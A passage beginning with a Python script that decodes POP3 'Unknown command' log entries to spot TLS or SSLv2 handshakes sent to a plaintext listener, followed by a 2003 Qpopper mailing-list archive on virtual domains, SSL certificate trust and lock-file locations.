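UNKNOWN_CMD_RE = re.compile(r'Unknown command: "(.*)"')

SAMPLE_LOG = [
    r'-ERR Unknown command: "\200l^A^C^A"',   # the line from the post
    r'-ERR Unknown command: "USRE"',          # constructed: a mistyped USER
    r'-ERR Unknown command: "^V^C^A^B^@"',    # constructed: TLS record header
]


def decode_log_escapes(text):
    """Turn escaped text such as \\200l^A^C^A back into the raw bytes."""
    out = bytearray()
    i = 0
    while i < len(text):
        ch = text[i]
        octal = text[i + 1:i + 4]
        if (ch == "\\" and len(octal) == 3
                and all(c in "01234567" for c in octal)
                and int(octal, 8) < 256):
            out.append(int(octal, 8))          # \200 -> 0x80
            i += 4
        elif ch == "^" and i + 1 < len(text) and 0x3F <= ord(text[i + 1]) <= 0x5F:
            out.append(ord(text[i + 1]) ^ 0x40)  # ^A -> 0x01, ^@ -> 0x00
            i += 2
        else:
            out += ch.encode("latin-1", errors="replace")
            i += 1
    return bytes(out)


def classify_first_bytes(data):
    """Say what a plaintext listener actually received as its first input."""
    # SSLv2-format ClientHello: 2-byte header with the high bit set and a
    # 15-bit length, message type 1, then the highest version offered.
    if (len(data) >= 5 and data[0] & 0x80 and data[2] == 0x01
            and (data[3], data[4]) in VERSIONS):
        return {"kind": "SSLv2-format ClientHello",
                "length": ((data[0] & 0x7F) << 8) | data[1],
                "version": VERSIONS[(data[3], data[4])]}
    # TLS record layer: content type 0x16 (handshake), version, 16-bit length.
    if (len(data) >= 5 and data[0] == 0x16 and data[1] == 0x03
            and (data[1], data[2]) in VERSIONS):
        return {"kind": "TLS handshake record",
                "length": (data[3] << 8) | data[4],
                "version": VERSIONS[(data[1], data[2])]}
    if data and all(0x20 <= b <= 0x7E for b in data):
        return {"kind": "plaintext", "length": None, "version": None}
    return {"kind": "unrecognised binary", "length": None, "version": None}


def scan_log(lines):
    """Return (line number, kind, version) for each handshake seen as a command."""
    findings = []
    for number, line in enumerate(lines, start=1):
        m = UNKNOWN_CMD_RE.search(line)
        if not m:
            continue
        info = classify_first_bytes(decode_log_escapes(m.group(1)))
        if info["version"] is not None:
            findings.append((number, info["kind"], info["version"]))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```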
Date: Mon, 22 Sep 2003 17:44:25 -0400
From: Chuck Yerkes <chuck+qpopper at yerkes dot com>
Subject: Re: How to setup multiple domain pop server
Quoting Alan Brown (alanb at digistar dot com):
> On Sun, 21 Sep 2003, Richard Gration wrote:
...
> There are _hacks_ to do this, but if the original poster wants it, he's
> better off moving to a pop3/imap server which can handle it
> semi-natively.
Yes.
> People, qpopper is good at what it does (SMALL, SIMPLE(*) server pop3
> facilities), but let's keep it that way, rather than trying to turn it
> into a marching band.
>
>
> (*) Emphasis on small and simple. I wouldn't use it past 1500 users, or
> for trying to pull half the stunts people are attempting here. If you
> want pop3 users to provide user@domain and have mapping, use a server
> designed from the ground up for virtual domain facilities.
Damn, I'll have to remove it from the 4 million user plus systems I've
built before. See also Nick Christenson's paper on his work at Earthlink.
(and yes, mail.local and qpopper were hacked some, but mostly for
auth and to handle NFS based storage).
Best answer to orig question:
virtusertable maps "info@domain1" to info-domain1
and client pops in as that.
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: SSL CA Certificate problem
Date: Mon, 22 Sep 2003 17:47:54 -0400
Here's another one. My SSL certificate is a Comodo InstantSSL. When I
received my cert, I also got a ca-bundle file. I was able to use this file
with Apache and Sendmail, and connecting clients use the cert without a
problem.
With QPopper, however, upon connection, Outlook Express says that the
certificate is not from a trusted authority. I didn't see anything in the
config that looks like a ca_cert option... is there another way?
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Mon, 22 Sep 2003 18:16:54 -0400 (EDT)
From: Alan Brown <alanb at digistar dot com>
Subject: Re: How to setup multiple domain pop server
On Mon, 22 Sep 2003, Chuck Yerkes wrote:
> Damn, I'll have to remove it from the 4 million user plus systems I've
> built before. See also Nick Christenson's paper on his work at Earthlink.
I'm aware of those efforts. I'm also sure that if you were to start over
today you wouldn't do it with Qpopper.
> Best answer to orig question:
> virtusertable maps "info@domain1" to info-domain1
> and client pops in as that.
better to be domain1-info, IMHO, but I suspect the OP doesn't want to do
it that way for whatever reason.
AB
From: "Alan W. Rateliff, II" <lists at rateliff dot net>
Subject: SSL help, Qpopper and Sendmail
Date: Mon, 22 Sep 2003 23:06:44 -0400
Okay, I'm at my wit's end. I would appreciate anyone who has experience
with non-VeriSign certificates with QPopper and/or Sendmail. Specifically,
I am using Comodo InstantSSL.
According to their webfaq [1], the root cert is supposedly part of Windows
since 98SE, and MacOS 9 and up, and compatible with several modern browsers.
The problem I'm having is that no client wants to trust the certificate as
installed in QPopper and Sendmail. Well, Outlook Express does, but not
before barfing on the POP3 server. Eudora, Pegasus, and Netscape Messenger
all pop up warning dialogues saying the root is not trusted.
I'm hoping this is just a server configuration error. I spent the money on
a real cert because I wanted to be "legit," but if I knew it would be this
much of a problem I just would have done like everyone else and signed my own
cert.
As usual, I appreciate any help I can get. Sendmail offers please reply
privately.
--
Alan W. Rateliff, II : RATELIFF.NET
Independent Technology Consultant : alan2 at rateliff dot net
(Office) 850/350-0260 : (Mobile) 850/559-0100
-------------------------------------------------------------
[System Administration][IT Consulting][Computer Sales/Repair]
Date: Tue, 23 Sep 2003 19:10:37 +1000
From: Wayne Heming <wheming at hemnet.com dot au>
Subject: Re: How to setup multiple domain pop server
Certainly got a little discussion going.
All valid points, but more and more virtual domains are out there. Sooner
or later it will be the norm rather than the exception.
Will have to go with this for the time being.
> > Best answer to orig question:
> > virtusertable maps "info@domain1" to info-domain1
> > and client pops in as that.
Wayne
At 06:16 PM 22/09/2003 -0400, Alan Brown wrote:
>On Mon, 22 Sep 2003, Chuck Yerkes wrote:
>
> > Damn, I'll have to remove it from the 4 million user plus systems I've
> > built before. See also nick christenson's paper on his work at Earthlink.
>
>I'm aware of those efforts. I'm also sure that if you were to start over
>today you wouldn't do it with Qpopper
>
> > Best answer to orig question:
> > virtusertable maps "info@domain1" to info-domain1
> > and client pops in as that.
>
>better to be domain1-info, IMHO, but I suspect the OP doesn't want to do
>it that way for whatever reason.
>
>AB
Date: Tue, 23 Sep 2003 14:52:53 -0000
Subject: .lock files and quotas
From: "Chris Szilagyi" <chris at apex-internet dot com>
Hello,
I've got an issue with Qpopper 3.1.2, on Red Hat 7.1 (with sendmail and
procmail). Basically, I have a problem whereby I'd like to tell Qpopper
where to place the <user>.lock files. It seems the default is /var/mail/ and
I'm having issues with user quotas, and would like to have it put the .lock
files in a location like /var/lock/mail or something other than in the spool
dir. I've read older posts that say this can be done but I haven't seen
anything in the Qpopper 3.1.2 documentation on this. Can somebody please
tell me how this can be done?? Thanks for all feedback...
--
Chris
Date: Tue, 23 Sep 2003 17:55:31 -0000
Subject: Re: .lock files and quotas
From: "Chris Szilagyi" <chris at apex-internet dot com>
"Errol U. Neal Jr." <errol.neal at enhtech dot com> said:
> At 10:52 AM 9/23/2003, Chris Szilagyi wrote:
> >Hello,
> >
> >I've got an issue with Qpopper 3.1.2, on Red Hat 7.1 (with sendmail and
> >procmail). Basically, I have a problem whereby I'd like to tell Qpopper
> >where to place the <user>.lock files. It seems the default is /var/mail/ and
> >I'm having issues with user quotas, and would like to have it put the .lock
> >files in a location like /var/lock/mail or something other than in the spool
> >dir. I've read older posts that says this can be done but I haven't seen
> >anything in the Qpopper 3.1.2 documentation on this. Can somebody please
> >tell me how this can be done?? Thanks for all feedback...
> >
> >--
> >Chris
>
>
> You need to rebuild the rpm or the source. Check the configure options. I
>
Actually I am using a version I built from the source for v 3.1.2. I have
looked through the documentation and have not seen anything about redirecting
the <user>.lock files to another location. I am using "--enable-temp-drop-dir="
but it only seems to affect the .<user>.pop files. I would appreciate
any additional help or if anybody can recall what exactly needs to be done in
order to redirect the <user>.lock files. Thanks...
--
Chris
Date: Tue, 23 Sep 2003 14:32:44 -0700
From: Kenneth Porter <shiva at sewingwitch dot com>
Subject: Re: SSL help, Qpopper and Sendmail
--On Monday, September 22, 2003 11:06 PM -0400 "Alan W. Rateliff, II"
<lists at rateliff dot net> wrote:
> The problem I'm having is that no client wants to trust the certificate as
> installed in QPopper and Sendmail. Well, Outlook Express does, but not
> before barfing on the POP3 server. Eudora, Pegasus, and Netscape Messenger
> all pop up warning dialogues saying the root is not trusted.
If you don't get a reply here, try on the openssl list, where there's likely
to be much more expertise with handling certs. But we'd be interested in
hearing any resolution you find.
Last updated on 23 Sep 2003 by Pensive Mailing List Admin